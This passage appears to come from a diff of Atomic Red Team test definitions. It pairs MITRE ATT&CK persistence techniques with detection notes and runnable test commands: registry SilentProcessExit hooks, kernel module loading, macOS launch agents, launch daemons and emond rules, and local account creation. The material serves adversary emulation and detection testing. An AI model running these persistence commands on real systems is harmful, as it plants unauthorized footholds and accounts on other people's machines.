NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}" + cleanup_command: | + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /f >nul 2>&1 + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /f >nul 2>&1 + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1 + name: command_prompt + elevation_required: true + T1525: + technique: + external_references: + - source_name: mitre-attack + external_id: T1525 + url: https://attack.mitre.org/techniques/T1525 + - source_name: Rhino Labs Cloud Image Backdoor Technique Sept 2019 + url: https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/ + description: Rhino Labs. (2019, August). Exploiting AWS ECR and ECS with the + Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019. + - source_name: Rhino Labs Cloud Backdoor September 2019 + url: https://github.com/RhinoSecurityLabs/ccat + description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT). + Retrieved September 12, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Implant Internal Image + description: |- + Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) + + A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) + id: attack-pattern--4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-12T18:28:27.948Z' + created: '2019-09-04T12:04:03.552Z' + x_mitre_is_subtechnique: false + x_mitre_data_sources: + - 'Image: Image Creation' + - 'Image: Image Modification' + x_mitre_detection: "Monitor interactions with images and containers by users + to identify ones that are added or modified anomalously.\n\nIn containerized + environments, changes may be detectable by monitoring the Docker daemon logs + or setting up and monitoring Kubernetes audit logs depending on registry configuration. " + x_mitre_permissions_required: + - User + x_mitre_version: '2.0' + x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team + - Vishwas Manral, McAfee + - Praetorian + x_mitre_platforms: + - IaaS + - Containers + atomic_tests: [] + T1547.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.006 + url: https://attack.mitre.org/techniques/T1547/006 + - source_name: Linux Kernel Programming + url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf + description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel + Module Programming Guide. Retrieved April 6, 2018. + - url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html + description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. + Retrieved April 6, 2018. + source_name: Linux Kernel Module Programming Guide + - url: http://www.megasecurity.org/papers/Rootkits.pdf + description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved + April 6, 2018. + source_name: iDefense Rootkit Overview + - source_name: Apple Kernel Extension Deprecation + url: https://developer.apple.com/support/kernel-extensions/ + description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension + Alternatives. Retrieved November 4, 2020. + - url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html + description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility + to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.' + source_name: Volatility Phalanx2 + - url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ + description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. + Retrieved December 21, 2017. + source_name: CrowdStrike Linux Rootkit + - url: https://github.com/f0rb1dd3n/Reptile + description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved + April 9, 2018. + source_name: GitHub Reptile + - url: https://github.com/m0nad/Diamorphine + description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux + Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018. + source_name: GitHub Diamorphine + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. + Retrieved April 6, 2018. + source_name: RSAC 2015 San Francisco Patrick Wardle + - url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/ + description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel + Extension Loading’ is Broken. Retrieved April 6, 2018. + source_name: Synack Secure Kernel Extension Broken + - url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/ + description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble + your MacOS spy. Retrieved April 6, 2018.' + source_name: Securelist Ventir + - source_name: Trend Micro Skidmap + url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/ + description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux + Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. + Retrieved June 4, 2020. + - url: http://tldp.org/HOWTO/Module-HOWTO/x197.html + description: Henderson, B. (2006, September 24). How To Insert And Remove + LKMs. Retrieved April 9, 2018. + source_name: Linux Loadable Kernel Module Insert and Remove LKMs + - url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux + description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved + April 9, 2018. + source_name: Wikipedia Loadable Kernel Module + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Kernel Modules and Extensions + description: |- + Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)  + + When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) + + Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation) + + Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap) + id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-03-30T00:59:53.716Z' + created: '2020-01-24T17:42:23.339Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - root + x_mitre_detection: |- + Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module) + + For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity. + + Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r) + x_mitre_data_sources: + - 'Command: Command Execution' + - 'File: File Creation' + - 'Kernel: Kernel Module Load' + x_mitre_contributors: + - Wayne Silva, F-Secure Countercept + - Anastasios Pingios + - Jeremy Galloway + - Red Canary + x_mitre_platforms: + - macOS + - Linux + identifier: T1547.006 + atomic_tests: + - name: Linux - Load Kernel Module via insmod + auto_generated_guid: 687dcb93-9656-4853-9c36-9977315e9d23 + description: 'This test uses the insmod command to load a kernel module for + Linux. + +' + supported_platforms: + - linux + input_arguments: + module_name: + description: Name of the kernel module name. + type: string + default: T1547006 + module_path: + description: Folder used to store the module. + type: path + default: "/tmp/T1547.006/T1547006.ko" + temp_folder: + description: Temp folder used to compile the code. + type: path + default: "/tmp/T1547.006" + module_source_path: + description: Path to download Gsecdump binary file + type: url + default: PathToAtomicsFolder/T1547.006/src + dependency_executor_name: bash + dependencies: + - description: 'The kernel module must exist on disk at specified location + +' + prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; + +' + get_prereq_command: | + if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; + cp #{module_source_path}/* #{temp_folder}/ + cd #{temp_folder}; make + if [ ! -f #{module_path} ]; then mv #{temp_folder}/#{module_name}.ko #{module_path}; fi; + executor: + command: 'sudo insmod #{module_path} + +' + cleanup_command: | + sudo rmmod #{module_name} + [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} + name: bash + elevation_required: true + T1546.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.006 + url: https://attack.mitre.org/techniques/T1546/006 + - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf + description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved + July 10, 2017. + source_name: Writing Bad Malware for OSX + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. + Retrieved July 10, 2017. + source_name: Malware Persistence on OS X + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: LC_LOAD_DYLIB Addition + description: |- + Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. + + Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X) + id: attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-30T00:51:58.454Z' + created: '2020-01-24T14:21:52.750Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: Monitor processes for those that may be used to modify binary + headers. Monitor file systems for changes to application binaries and invalid + checksums/signatures. Changes to binaries that do not line up with application + updates or patches are also extremely suspicious. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Metadata' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_platforms: + - macOS + atomic_tests: [] + T1547.008: + technique: + created: '2020-01-24T18:38:55.801Z' + modified: '2020-03-25T16:52:26.567Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4 + description: |- + Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem) + + Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. + name: LSASS Driver + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.008 + url: https://attack.mitre.org/techniques/T1547/008 + - url: https://technet.microsoft.com/library/cc961760.aspx + description: Microsoft. (n.d.). Security Subsystem Architecture. Retrieved + November 27, 2017. + source_name: Microsoft Security Subsystem + - url: https://technet.microsoft.com/library/dn408187.aspx + description: Microsoft. (2014, March 12). Configuring Additional LSA Protection. + Retrieved November 27, 2017. + source_name: Microsoft LSA Protection Mar 2014 + - url: https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx + description: Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November + 27, 2017. + source_name: Microsoft DLL Security + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Vincent Le Toux + x_mitre_data_sources: + - 'Module: Module Load' + - 'Driver: Driver Load' + - 'File: File Modification' + - 'File: File Creation' + x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events + 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: + Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. + (Citation: Microsoft DLL Security)\n\nUtilize the Sysinternals Autoruns/Autorunsc + utility (Citation: TechNet Autoruns) to examine loaded drivers associated + with the LSA. " + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1543.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1543.001 + url: https://attack.mitre.org/techniques/T1543/001 + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. + source_name: AppleDocs Launch Agent Daemons + - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ + description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware + is hungry for credentials. Retrieved July 3, 2017. + source_name: OSX Keydnap malware + - url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ + description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated + code. Retrieved July 5, 2017. + source_name: Antiquated Mac Malware + - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ + description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web + traffic. Retrieved July 10, 2017. + source_name: OSX.Dok Malware + - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ + description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). + Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. + source_name: Sofacy Komplex Trojan + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf + description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical + OS X Malware Detection & Analysis. Retrieved July 10, 2017.' + source_name: OSX Malware Detection + - url: https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update + description: Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application + Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. + source_name: OceanLotus for OS X + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Launch Agent + description: "Adversaries may create or modify launch agents to repeatedly execute + malicious payloads as part of persistence. Per Apple’s developer documentation, + when a user logs in, a per-user launchd process is started which loads the + parameters for each launch-on-demand user agent from the property list (plist) + files found in /System/Library/LaunchAgents, /Library/LaunchAgents, + and $HOME/Library/LaunchAgents (Citation: AppleDocs Launch Agent + Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). + These launch agents have property list files which point to the executables + that will be launched (Citation: OSX.Dok Malware).\n \nAdversaries may install + a new launch agent that can be configured to execute at login by using launchd + or launchctl to load a plist into the appropriate directories (Citation: + Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The + agent name may be disguised by using a name from a related operating system + or benign software. Launch Agents are created with user level privileges and + are executed with the privileges of the user when they log in (Citation: OSX + Malware Detection) (Citation: OceanLotus for OS X). They can be set up to + execute when a specific user logs in (in the specific user’s directory structure) + or when any user logs in (which requires administrator privileges)." + id: attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T22:11:45.513Z' + created: '2020-01-17T16:10:58.592Z' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Command: Command Execution' + - 'Service: Service Creation' + - 'Service: Service Modification' + x_mitre_detection: Monitor Launch Agent creation through additional plist files + and utilities such as Objective-See’s KnockKnock application. Launch Agents + also require files on disk for persistence which can also be monitored via + other file monitoring applications. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_platforms: + - macOS + identifier: T1543.001 + atomic_tests: + - name: Launch Agent + auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 + description: 'Create a plist and execute it + +' + supported_platforms: + - macos + input_arguments: + plist_filename: + description: filename + type: string + default: com.atomicredteam.plist + path_malicious_plist: + description: Name of file to store in cron folder + type: string + default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_malicious_plist}) + +' + prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; + exit 1; + +' + executor: + name: bash + elevation_required: true + command: | + if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi; + sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename} + sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename} + cleanup: | + sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename} + sudo rm ~/Library/LaunchAgents/#{plist_filename} + T1543.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1543.004 + url: https://attack.mitre.org/techniques/T1543/004 + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. + source_name: AppleDocs Launch Agent Daemons + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf + description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical + OS X Malware Detection & Analysis. Retrieved July 10, 2017.' + source_name: OSX Malware Detection + - url: https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf + description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. + Retrieved July 10, 2017.' + source_name: WireLurker + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Launch Daemon + description: "Adversaries may create or modify launch daemons to repeatedly + execute malicious payloads as part of persistence. Per Apple’s developer documentation, + when macOS and OS X boot up, launchd is run to finish system initialization. + This process loads the parameters for each launch-on-demand system-level daemon + from the property list (plist) files found in /System/Library/LaunchDaemons + and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent + Daemons). These LaunchDaemons have property list files which point to the + executables that will be launched (Citation: Methods of Mac Malware Persistence). + \n\nAdversaries may install a new launch daemon that can be configured to + execute at startup by using launchd or launchctl to load a plist into the + appropriate directories (Citation: OSX Malware Detection). The daemon name + may be disguised by using a name from a related operating system or benign + software (Citation: WireLurker). Launch Daemons may be created with administrator + privileges, but are executed under root privileges, so an adversary may also + use a service to escalate privileges from administrator to root. \n\nThe plist + file permissions must be root:wheel, but the script or program that it points + to has no such requirement. So, it is possible for poor configurations to + allow an adversary to modify a current Launch Daemon’s executable and gain + persistence or Privilege Escalation. " + id: attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-09-16T15:46:44.130Z' + created: '2020-01-17T19:23:15.227Z' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Service: Service Creation' + - 'Service: Service Modification' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - root + x_mitre_permissions_required: + - Administrator + x_mitre_detection: 'Monitor for launch daemon creation or modification through + plist files and utilities such as Objective-See''s KnockKnock application. ' + x_mitre_platforms: + - macOS + identifier: T1543.004 + atomic_tests: + - name: Launch Daemon + auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf + description: 'Utilize LaunchDaemon to launch `Hello World` + +' + supported_platforms: + - macos + input_arguments: + plist_filename: + description: filename + type: string + default: com.atomicredteam.plist + path_malicious_plist: + description: Name of file to store in cron folder + type: string + default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_malicious_plist}) + +' + prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and + try again."; exit 1; + +' + executor: + name: bash + elevation_required: true + command: | + sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} + sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} + cleanup: | + sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} + sudo rm /Library/LaunchDaemons/#{plist_filename} + T1053.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.004 + url: https://attack.mitre.org/techniques/T1053/004 + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. + source_name: AppleDocs Launch Agent Daemons + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Launchd + description: |- + Adversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). + + An adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in. + id: attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-23T22:41:14.739Z' + created: '2019-12-03T14:15:27.452Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: false + x_mitre_permissions_required: + - root + x_mitre_detection: "Monitor scheduled task creation from common utilities using + command-line invocation. Legitimate scheduled tasks may be created during + installation of new software or through system administration functions. Look + for changes to tasks that do not correlate with known software, patch cycles, + etc. \n\nSuspicious program execution through scheduled tasks may show up + as outlier processes that have not been seen before when compared against + historical data. Data and events should not be viewed in isolation, but as + part of a chain of behavior that could lead to other activities, such as network + connections made for Command and Control, learning details about the environment + through Discovery, and Lateral Movement." + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - macOS + identifier: T1053.004 + atomic_tests: + - name: Event Monitor Daemon Persistence + auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e + description: "This test adds persistence via a plist to execute via the macOS + Event Monitor Daemon. \n" + supported_platforms: + - macos + input_arguments: + script_location: + description: evil plist location + type: path + default: "$PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist" + script_destination: + description: Path where to move the evil plist + type: path + default: "/etc/emond.d/rules/atomicredteam_T1053_004.plist" + empty_file: + description: Random name of the empty file used to trigger emond service + type: string + default: randomflag + executor: + name: bash + elevation_required: true + command: | + sudo cp #{script_location} #{script_destination} + sudo touch /private/var/db/emondClients/#{empty_file} + cleanup_command: | + sudo rm #{script_destination} + sudo rm /private/var/db/emondClients/#{empty_file} + T1136.001: + technique: + created: '2020-01-28T13:50:22.506Z' + modified: '2020-03-23T18:04:20.780Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--635cbe30-392d-4e27-978e-66774357c762 + description: |- + Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. + + Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. + name: Local Account + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1136.001 + url: https://attack.mitre.org/techniques/T1136/001 + - source_name: Microsoft User Creation Event + description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account + was created. Retrieved June 30, 2017.' + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - 'User Account: User Account Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: 'Monitor for processes and command-line parameters associated + with local account creation, such as net user /add or useradd. + Collect data on account creation within a network. Event ID 4720 is generated + when a user account is created on a Windows system. (Citation: Microsoft User + Creation Event) Perform regular audits of local system accounts to detect + suspicious accounts that may have been created by an adversary.' + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1136.001 + atomic_tests: + - name: Create a user account on a Linux system + auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 + description: 'Create a user via useradd + +' + supported_platforms: + - linux + input_arguments: + username: + description: Username of the user to create + type: String + default: evil_user + executor: + command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} + +' + cleanup_command: 'userdel 